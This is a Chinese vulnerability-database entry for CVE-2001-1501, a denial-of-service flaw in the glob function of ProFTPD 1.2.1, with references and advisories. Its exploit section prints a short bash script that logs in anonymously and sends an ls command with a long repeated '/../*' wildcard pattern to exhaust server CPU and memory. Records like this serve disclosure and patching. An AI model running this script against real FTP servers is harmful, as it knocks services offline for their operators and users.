ProFTPD glob函数服务拒绝漏洞

ProFTPD glob函数服务拒绝漏洞

漏洞ID 1106254 漏洞类型 未知
发布时间 2001-03-15 更新时间 2001-12-31
图片[1]-ProFTPD glob函数服务拒绝漏洞-安全小百科CVE编号 CVE-2001-1501
图片[2]-ProFTPD glob函数服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200112-252
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20690
https://www.securityfocus.com/bid/89750
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-252
|漏洞详情
ProFTPD1.2.1和可能其他版本的glob函数存在漏洞。因此攻击者可以借助带有超长wildcard和其他特殊字符的命令导致服务拒绝(CPU和内存消耗),正如使用带有多个(1)”*/..”,(2)”*/.*”或(3)参数中的”.*./*?/”序列ls命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2496/info

Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits.

Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc.

The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented. 

#!/bin/bash=20
ftp -n FTP-SERVER<<end=20
quot user anonymous
bin
quot pass [email protected]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20
|受影响的产品
ProFTPD Project ProFTPD 1.2.1
|参考资料

来源:CONECTIVA
名称:CLA-2002:450
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000450
来源:MANDRAKE
名称:MDKSA-2002:005
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2002:005

相关推荐: Alibaba genkey交易明文发送漏洞

Alibaba genkey交易明文发送漏洞 漏洞ID 1206761 漏洞类型 未知 发布时间 1999-12-31 更新时间 1999-12-31 CVE编号 CVE-1999-1444 CNNVD-ID CNNVD-199912-122 漏洞平台 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享